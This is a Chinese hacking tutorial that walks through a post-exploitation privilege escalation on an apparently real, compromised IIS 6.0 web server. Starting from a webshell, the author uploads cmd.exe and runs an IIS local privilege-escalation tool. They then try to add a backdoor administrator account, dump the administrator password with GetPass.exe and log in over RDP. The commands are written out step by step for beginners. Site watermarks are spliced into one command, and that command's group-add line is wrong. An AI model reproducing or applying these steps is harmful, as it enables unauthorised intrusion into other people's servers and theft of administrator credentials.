我们手里现在有一个小webshell,访问速度挺快,网站用途也算不小,我估计服务器配置也不很低吧。仅仅是估计。
那么开工。
先用菜刀执行一下cmd,看看是否可以执行。


呐,这里呢是不能直接执行的。
我们传个cmd上去再试试,   这里呢,不懂的新手可以先看看我的另一篇帖子,提权某理工大学分站学院

上传完成 设置路径 setp C:\RECYCLER\cmd.exe

再试命令  whoami
有反应了,network service这个权限比较低,不能执行命令。


因为服务器是IIS6.0我们用iis漏洞试试,  上篇帖子已经讲了,不懂的去看看,下面我就不重复了。
执行一下C:\RECYCLER\iis.exe "whoami" 权限直接就是administrator    还算顺利,
那么创建个用户吧。执行 C:\RECYCLER\iis.exe "net user admin1 123456 /add & net localgroup administrators 123456 /add" www.2cto.com
这条命令的意思是 创建一个admin1的用户 密码为123456  并加到管理组
这里就出现了一个奇怪的现象。。   显示的执行成功, 但却没有创建用户。


这个情况我就不截图了,因为我电脑很卡,很慢。 
我用net user查询一下红黑联盟用户   还是只有administrator   

这里呢,思考一下, 抓管理员密码是最方便的办法。
远程3389端口也是开启的,如果抓到密码,直接登陆,那么将会是最简便的方式。

抓管理员密码要用什么呢? 这里好多新手要问了。  不要着急,今天我给大家介绍getpass.exe的使用方法。
首先,我们要下载一个getpass.exe
然后呢,上传到服务器上面去。
这里我把他上传到C盘回收站去了。  大家请看图。



getpass.exe使用也非常简单,直接用命令运行就可以了。也可以加个参数-d  防止卡住。

命令就这样C:\RECYCLER\GetPass.exe
我这里需要用iis.exe的权限来执行。
看图    我是这样执行的C:\RECYCLER\iis.exe "C:\RECYCLER\GetPass.exe -d"



好了,我们看到下面返回了一大坨数据。

 


眼尖的小伙伴们一下子就能找到administrator的信息。   这里password:后面的一串密码就是管理员的密码

有了账号和密码。那还等什么呀,赶紧去登陆试试吧!




登陆成功,   还是八核的,16G内存。我猜的没错呢。
一般比较大一点的网站,速度比较快的,他们的服务器配置也不会太低。

总结一下这次的思路,首先是上传一个cmd,可以执行命令,然后利用iis溢出程序把执行权限提升,成功获得了administrator的执行权限。
我们添加用户,发现并不能成功添加。这时候利用getpass直接抓取管理员的密码,抓取成功,登陆3389。结束。
这次讲的是比较简单顺利的方法,当然,有些时候我们也会遇到一些比较难提权的,所以我们需要不断地去学习,加油。